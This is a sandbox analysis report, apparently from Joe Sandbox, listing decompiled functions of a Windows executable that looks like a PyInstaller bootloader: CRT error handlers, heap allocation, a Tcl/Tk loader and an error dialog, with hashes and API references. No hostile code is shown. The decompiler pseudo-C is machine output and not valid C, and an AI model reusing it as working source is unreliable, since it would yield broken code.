Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
Instruction ID: 2092866fc2fb777ddb374b4d7a065dd84a174c5c40cf09acda402532f73df2d6
Opcode Fuzzy Hash: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
Instruction Fuzzy Hash: 62115421A1C681C1FA66BF51940027DE260BFA6B84FD44472EF4C57A87DFBFD6208760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8F56AC Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF7DA8F56AC(intOrPtr* __rax, long long __rbx, long long _a8, intOrPtr _a40) {

				_a8 = __rbx;
				if (_a40 != 0) goto 0xda8f56e1;
				E00007FF77FF7DA8E4394(__rax);
				 *__rax = 0x16;
				E00007FF77FF7DA8E9D00();
				return 0x16;
			}

0x7ff7da8f56ac
0x7ff7da8f56c1
0x7ff7da8f56c3
0x7ff7da8f56cd
0x7ff7da8f56cf
0x7ff7da8f56e0

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F56CF

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8ab5c6977405cb0da174d71da5799961f335fed1fd48e027706f666140a89b5c
Instruction ID: 07017cc4dafa9ea8bb6855d47cc89df70cf5ff4c8227bdb47b94158e15dbc1f2
Opcode Fuzzy Hash: 8ab5c6977405cb0da174d71da5799961f335fed1fd48e027706f666140a89b5c
Instruction Fuzzy Hash: B821D332A0CA4387EB26AF18D44076DB7A0FB94B54FD44236DA6D876DADF3DD4118B10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DF56C Relevance: 1.5, APIs: 1, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF7DA8DF56C(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9, long long __r14, void* _a8, void* _a16, void* _a24, void* _a32, intOrPtr _a40) {
				intOrPtr* _t19;
				intOrPtr* _t31;

				_t19 = _t31;
				 *((long long*)(_t19 + 8)) = __rbx;
				 *((long long*)(_t19 + 0x10)) = __rsi;
				 *((long long*)(_t19 + 0x18)) = __rdi;
				 *((long long*)(_t19 + 0x20)) = __r14;
				if (__r8 == 0) goto 0xda8df5c5;
				if (__r9 == 0) goto 0xda8df5c5;
				if (_a40 != 0) goto 0xda8df5e2;
				if (__rdx == 0xffffffff) goto 0xda8df5b5;
				E00007FF77FF7DA8DC170();
				E00007FF77FF7DA8E4394(_t19);
				 *_t19 = 0x16;
				E00007FF77FF7DA8E9D00();
				return 0;
			}

0x7ff7da8df56c
0x7ff7da8df56f
0x7ff7da8df573
0x7ff7da8df577
0x7ff7da8df57b
0x7ff7da8df594
0x7ff7da8df599
0x7ff7da8df5a3
0x7ff7da8df5a9
0x7ff7da8df5b0
0x7ff7da8df5b5
0x7ff7da8df5ba
0x7ff7da8df5c0
0x7ff7da8df5e1

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8DF5C0

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1748ab499dec2cd63d41733e33088bccb1bfcf71d5c0ce3e5d0110a60e1804e7
Instruction ID: 24ae969e189b508d69917cac0ccadc7450e87b47fd9fc86ded991eb5adde6486
Opcode Fuzzy Hash: 1748ab499dec2cd63d41733e33088bccb1bfcf71d5c0ce3e5d0110a60e1804e7
Instruction Fuzzy Hash: 6D01C221A0874280FA06BF62990006DE7A1BB51FE0FCC46B2DE5D03BCBDE3DD5218710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E6A94 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF7DA8E6A94(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				if (__ecx - 0x2000 < 0) goto 0xda8e6adc;
				E00007FF77FF7DA8E4394(__rax);
				 *__rax = 9;
				E00007FF77FF7DA8E9D00();
				return 9;
			}

0x7ff7da8e6a94
0x7ff7da8e6a99
0x7ff7da8e6a9e
0x7ff7da8e6ab1
0x7ff7da8e6ab3
0x7ff7da8e6abd
0x7ff7da8e6abf
0x7ff7da8e6adb

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E6ABF

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 12e0e53eb4cc63a95771bdcd00f2c9527e1bc8f393490eaab8484543856046e8
Instruction ID: c9fb58995f72a8cc0afb13b08d901c09a5809cbaba3d4bece707ed9d478f25b1
Opcode Fuzzy Hash: 12e0e53eb4cc63a95771bdcd00f2c9527e1bc8f393490eaab8484543856046e8
Instruction Fuzzy Hash: 97119032918642C6F302BB10E84052DE7A5FB94340FC504B6DA5E876A3DF3EEA318720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EDC90 Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FF77FF7DA8EDC90(void* __eax, signed int __rcx, signed int __rdx) {
				void* __rbx;
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0xda8edcaf;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0xda8edcf2;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0xda8edcd6;
				if (E00007FF77FF7DA8E8A3C() == 0) goto 0xda8edcf2;
				if (E00007FF77FF7DA8F2600(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0xda8edcf2;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0xda8edcc1;
				goto 0xda8edcff;
				E00007FF77FF7DA8E4394(_t22);
				 *_t22 = 0xc;
				return 0;
			}

0x7ff7da8edc90
0x7ff7da8edc9f
0x7ff7da8edca3
0x7ff7da8edca3
0x7ff7da8edcad
0x7ff7da8edcbb
0x7ff7da8edcbf
0x7ff7da8edcc8
0x7ff7da8edcd4
0x7ff7da8edce5
0x7ff7da8edcee
0x7ff7da8edcf0
0x7ff7da8edcf2
0x7ff7da8edcf7
0x7ff7da8edd04

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7DA8EA806,?,?,?,00007FF7DA8E99C3,?,?,00000000,00007FF7DA8E9C5E), ref: 00007FF7DA8EDCE5

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0fa1f60e180c30099cd92909c4dd9370885fd91a8a3bc9aba6531de80905ccc9
Instruction ID: f9cb75b86dfed081d1e5178051efa6ceb2dd92a86c613ca8f2524a4e5c97fcbb
Opcode Fuzzy Hash: 0fa1f60e180c30099cd92909c4dd9370885fd91a8a3bc9aba6531de80905ccc9
Instruction Fuzzy Hash: 62F04F62B0D24780FE56765659003BCD2807FA8B80FCC04B2CD1E863C3ED6DE6A88230

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8ECA1C Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FF77FF7DA8ECA1C(intOrPtr* __rax, void* __rcx) {
				void* __rbx;

				if (__rcx - 0xffffffe0 > 0) goto 0xda8eca67;
				_t16 =  ==  ? __rax : __rcx;
				goto 0xda8eca4e;
				if (E00007FF77FF7DA8E8A3C() == 0) goto 0xda8eca67;
				if (E00007FF77FF7DA8F2600(__rax,  ==  ? __rax : __rcx,  ==  ? __rax : __rcx) == 0) goto 0xda8eca67;
				RtlAllocateHeap(??, ??, ??); // executed
				if (__rax == 0) goto 0xda8eca39;
				goto 0xda8eca74;
				E00007FF77FF7DA8E4394(__rax);
				 *__rax = 0xc;
				return 0;
			}

0x7ff7da8eca29
0x7ff7da8eca33
0x7ff7da8eca37
0x7ff7da8eca40
0x7ff7da8eca4c
0x7ff7da8eca5a
0x7ff7da8eca63
0x7ff7da8eca65
0x7ff7da8eca67
0x7ff7da8eca6c
0x7ff7da8eca79

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF7DA8DFD94,?,?,?,00007FF7DA8E12A6,?,?,?,?,?,00007FF7DA8E2899), ref: 00007FF7DA8ECA5A

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a265fdf41e77f0447e092e6d79a5f46e27da0a7cb5c73acac927124eec024155
Instruction ID: b41c0a37077bb6284fdc9a78119566284772b6a1d620986c26f86d0f709e1859
Opcode Fuzzy Hash: a265fdf41e77f0447e092e6d79a5f46e27da0a7cb5c73acac927124eec024155
Instruction Fuzzy Hash: 15F05E91F1D24784FA66B6A1580167CD1807F64BA0FC806B2DD3E852C3ED2DA6709270

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D72A0 Relevance: 1.3, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: 59c9fcf1866f692c94e07a1b8768299e38a87715b608ffe401450eed44505d19
Instruction ID: 628479387acb4f51b5a31ab6afa37b9d467664bb39dca219d4f72dc578c56ba5
Opcode Fuzzy Hash: 59c9fcf1866f692c94e07a1b8768299e38a87715b608ffe401450eed44505d19
Instruction Fuzzy Hash: F9419616D186C685FB12AB24D5112FDA360FBA4784FD49273EF8D12153EF2CA2D9C320

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF7DA8D55B0 Relevance: 166.5, APIs: 31, Strings: 64, Instructions: 287
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E00007FF77FF7DA8D55B0(long long __rax, void* __rcx) {
				void* __rbx;
				long long _t11;
				void* _t12;
				void* _t22;
				void* _t23;

				_t11 = __rax;
				_t12 = __rcx;
				E00007FF77FF7DA8D7120(__rax, __rcx, __rcx + 0x10);
				 *((long long*)(_t12 + 0x4048)) = _t11;
				E00007FF77FF7DA8D7120(_t11, _t12, _t12 + 0x1010);
				 *((long long*)(_t12 + 0x4050)) = _t11;
				if ( *((intOrPtr*)(_t12 + 0x4048)) == 0) goto 0xda8d55fa;
				if (_t11 == 0) goto 0xda8d55fa;
				goto 0xda8d5f30;
				E00007FF77FF7DA8D2770(_t11, "LOADER: Failed to load tcl/tk libraries\n", _t11, _t22, _t23);
				return 0xffffffff;
			}

0x7ff7da8d55b0
0x7ff7da8d55b6
0x7ff7da8d55bd
0x7ff7da8d55c9
0x7ff7da8d55d0
0x7ff7da8d55dc
0x7ff7da8d55e6
0x7ff7da8d55eb
0x7ff7da8d55f5
0x7ff7da8d5601
0x7ff7da8d5610

APIs

Part of subcall function 00007FF7DA8D7120: LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7DA8D309E), ref: 00007FF7DA8D7143

GetProcAddress.KERNEL32 ref: 00007FF7DA8D5F47
GetProcAddress.KERNEL32 ref: 00007FF7DA8D5F86
GetProcAddress.KERNEL32 ref: 00007FF7DA8D5FAB
GetProcAddress.KERNEL32 ref: 00007FF7DA8D5FD0
GetProcAddress.KERNEL32 ref: 00007FF7DA8D5FF8
GetProcAddress.KERNEL32 ref: 00007FF7DA8D6020
GetProcAddress.KERNEL32 ref: 00007FF7DA8D6048
GetProcAddress.KERNEL32 ref: 00007FF7DA8D6070
GetProcAddress.KERNEL32 ref: 00007FF7DA8D6098

Strings

Failed to get address for Tk_Init, xrefs: 00007FF7DA8D63F2
Tcl_CreateObjCommand, xrefs: 00007FF7DA8D621E
Tcl_NewByteArrayObj, xrefs: 00007FF7DA8D6296
Tcl_DeleteInterp, xrefs: 00007FF7DA8D603E
Failed to get address for Tcl_CreateInterp, xrefs: 00007FF7DA8D5F98
Failed to get address for Tcl_NewStringObj, xrefs: 00007FF7DA8D628A
Failed to get address for Tcl_DeleteInterp, xrefs: 00007FF7DA8D605A
Tcl_ConditionWait, xrefs: 00007FF7DA8D6156
LOADER: Failed to load tcl/tk libraries, xrefs: 00007FF7DA8D55FA
Tcl_ConditionNotify, xrefs: 00007FF7DA8D612E
Failed to get address for Tcl_ConditionFinalize, xrefs: 00007FF7DA8D6122
Failed to get address for Tcl_EvalFile, xrefs: 00007FF7DA8D632A
Failed to get address for Tcl_CreateObjCommand, xrefs: 00007FF7DA8D623A
Tcl_Init, xrefs: 00007FF7DA8D5F40
Failed to get address for Tcl_MutexUnlock, xrefs: 00007FF7DA8D60FA
Tcl_FinalizeThread, xrefs: 00007FF7DA8D6016
Failed to get address for Tcl_Init, xrefs: 00007FF7DA8D5F59
Tcl_CreateInterp, xrefs: 00007FF7DA8D5F7C
Tcl_NewStringObj, xrefs: 00007FF7DA8D626E
Tcl_SetVar2Ex, xrefs: 00007FF7DA8D62BE
Tcl_Finalize, xrefs: 00007FF7DA8D5FEE
Failed to get address for Tcl_DoOneEvent, xrefs: 00007FF7DA8D5FE2
Failed to get address for Tk_GetNumMainWindows, xrefs: 00007FF7DA8D641A
Failed to get address for Tcl_SetVar2Ex, xrefs: 00007FF7DA8D62DA
Tcl_EvalObjv, xrefs: 00007FF7DA8D635E
Tcl_MutexUnlock, xrefs: 00007FF7DA8D60DE
Failed to get address for Tcl_FindExecutable, xrefs: 00007FF7DA8D5FBD
Failed to get address for Tcl_GetString, xrefs: 00007FF7DA8D6262
Failed to get address for Tcl_GetVar2, xrefs: 00007FF7DA8D61EA
Tcl_FindExecutable, xrefs: 00007FF7DA8D5FA1
Tcl_ThreadQueueEvent, xrefs: 00007FF7DA8D617E
Failed to get address for Tcl_Finalize, xrefs: 00007FF7DA8D600A
Tcl_GetObjResult, xrefs: 00007FF7DA8D62E6
Tcl_EvalEx, xrefs: 00007FF7DA8D6336
Tcl_SetVar2, xrefs: 00007FF7DA8D61F6
Tcl_EvalFile, xrefs: 00007FF7DA8D630E
Failed to get address for Tcl_NewByteArrayObj, xrefs: 00007FF7DA8D62B2
Tcl_ConditionFinalize, xrefs: 00007FF7DA8D6106
Tcl_Alloc, xrefs: 00007FF7DA8D6386
Failed to get address for Tcl_EvalEx, xrefs: 00007FF7DA8D6352
Failed to get address for Tcl_ConditionNotify, xrefs: 00007FF7DA8D614A
Failed to get address for Tcl_ThreadAlert, xrefs: 00007FF7DA8D61C2
Tcl_DoOneEvent, xrefs: 00007FF7DA8D5FC6
Tcl_GetString, xrefs: 00007FF7DA8D6246
Tcl_CreateThread, xrefs: 00007FF7DA8D6066
Failed to get address for Tcl_CreateThread, xrefs: 00007FF7DA8D6082
Failed to get address for Tcl_GetObjResult, xrefs: 00007FF7DA8D6302
Tcl_ThreadAlert, xrefs: 00007FF7DA8D61A6
Tcl_GetVar2, xrefs: 00007FF7DA8D61CE
Tcl_GetCurrentThread, xrefs: 00007FF7DA8D608E
Failed to get address for Tcl_EvalObjv, xrefs: 00007FF7DA8D637A
Failed to get address for Tcl_GetCurrentThread, xrefs: 00007FF7DA8D60AA
Failed to get address for Tcl_MutexLock, xrefs: 00007FF7DA8D60D2
Failed to get address for Tcl_Alloc, xrefs: 00007FF7DA8D63A2
Failed to get address for Tcl_FinalizeThread, xrefs: 00007FF7DA8D6032
Tcl_MutexLock, xrefs: 00007FF7DA8D60B6
GetProcAddress, xrefs: 00007FF7DA8D5F60
Failed to get address for Tcl_ConditionWait, xrefs: 00007FF7DA8D6172
Failed to get address for Tcl_ThreadQueueEvent, xrefs: 00007FF7DA8D619A
Tcl_Free, xrefs: 00007FF7DA8D63AE
Failed to get address for Tcl_Free, xrefs: 00007FF7DA8D63CA
Failed to get address for Tcl_SetVar2, xrefs: 00007FF7DA8D6212
Tk_GetNumMainWindows, xrefs: 00007FF7DA8D63FE
Tk_Init, xrefs: 00007FF7DA8D63D6

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$LOADER: Failed to load tcl/tk libraries$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 2238633743-1453502826
Opcode ID: a7ac00ce1a7fdfc215a9c78db55a5cef2ac37261bb2bde1204b0c918028e9db3
Instruction ID: f2b463c7de1490def46a89682daebeacc028d11f25010ee1b5407c8b22949631
Opcode Fuzzy Hash: a7ac00ce1a7fdfc215a9c78db55a5cef2ac37261bb2bde1204b0c918028e9db3
Instruction Fuzzy Hash: B9E1D9A4A19B0388FE1BAB14A85017CE3A5BF65754FD864B7CC0E46396EF7CA524C330

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D1B90 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON

Download Yara Rule

APIs

GetDialogBaseUnits.USER32 ref: 00007FF7DA8D1BDE
MulDiv.KERNEL32 ref: 00007FF7DA8D1BF2
MulDiv.KERNEL32 ref: 00007FF7DA8D1C13
SystemParametersInfoW.USER32 ref: 00007FF7DA8D1C5B
CreateFontIndirectW.GDI32 ref: 00007FF7DA8D1C6F
#380.COMCTL32 ref: 00007FF7DA8D1C93
CreateWindowExW.USER32 ref: 00007FF7DA8D1CE6
CreateWindowExW.USER32 ref: 00007FF7DA8D1D40
CreateWindowExW.USER32 ref: 00007FF7DA8D1D9D
CreateWindowExW.USER32 ref: 00007FF7DA8D1DFF
SendMessageW.USER32 ref: 00007FF7DA8D1E1F
SendMessageW.USER32 ref: 00007FF7DA8D1E39
SendMessageW.USER32 ref: 00007FF7DA8D1E58
SendMessageW.USER32 ref: 00007FF7DA8D1E77
SendMessageW.USER32 ref: 00007FF7DA8D1E95
SendMessageW.USER32 ref: 00007FF7DA8D1EB3
SendMessageW.USER32 ref: 00007FF7DA8D1ED1
SendMessageW.USER32 ref: 00007FF7DA8D1EE9
SendMessageW.USER32 ref: 00007FF7DA8D1F01
GetClientRect.USER32 ref: 00007FF7DA8D1F10

Part of subcall function 00007FF7DA8D2030: GetDC.USER32 ref: 00007FF7DA8D205B
Part of subcall function 00007FF7DA8D2030: SelectObject.GDI32 ref: 00007FF7DA8D20A2
Part of subcall function 00007FF7DA8D2030: DrawTextW.USER32 ref: 00007FF7DA8D20C5
Part of subcall function 00007FF7DA8D2030: SelectObject.GDI32 ref: 00007FF7DA8D20DB
Part of subcall function 00007FF7DA8D2030: ReleaseDC.USER32 ref: 00007FF7DA8D20EB
Part of subcall function 00007FF7DA8D2030: MoveWindow.USER32 ref: 00007FF7DA8D213B
Part of subcall function 00007FF7DA8D2030: MoveWindow.USER32 ref: 00007FF7DA8D217B
Part of subcall function 00007FF7DA8D2030: MoveWindow.USER32 ref: 00007FF7DA8D21CE

Strings

BUTTON, xrefs: 00007FF7DA8D1DB6
Failed to execute script '%ls' due to unhandled exception: %ls, xrefs: 00007FF7DA8D1BBD
Close, xrefs: 00007FF7DA8D1DA8
EDIT, xrefs: 00007FF7DA8D1D4B
STATIC, xrefs: 00007FF7DA8D1C9C, 00007FF7DA8D1CF1

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
API String ID: 2446303242-1601438679
Opcode ID: 4520ec83f770e6a2a936c389ad8bea2580ac62345c30f60f61398c95f5315d36
Instruction ID: a96727584f35de9f401e892ccd9f57b91ab936ec9510a9ea568401378a703689
Opcode Fuzzy Hash: 4520ec83f770e6a2a936c389ad8bea2580ac62345c30f60f61398c95f5315d36
Instruction Fuzzy Hash: 11A15836208B8286E7149F21E58479EF360F788B90F90452AEF8D03B25DF3DE169CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8F311C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E00007FF77FF7DA8F311C(void* __edx, void* __rbx, unsigned int __rcx, signed int __rdx, void* __rdi, void* __rsi, long long __r9, void* __r12, void* __r14, void* __r15) {
				signed long long _t33;
				void* _t46;
				void* _t48;
				void* _t49;
				signed long long _t50;
				long long _t55;

				_t46 = __rdi;
				_t48 = _t49 - 0x6f0;
				_t50 = _t49 - 0x7f0;
				_t33 =  *0xda90d008; // 0xde4e6c2f3c2e
				 *(_t48 + 0x6e0) = _t33 ^ _t50;
				_t55 =  *((intOrPtr*)(_t48 + 0x750));
				 *(_t50 + 0x50) = __rcx;
				 *((long long*)(_t48 - 0x78)) = _t55;
				 *((long long*)(_t48 - 0x68)) = __r9;
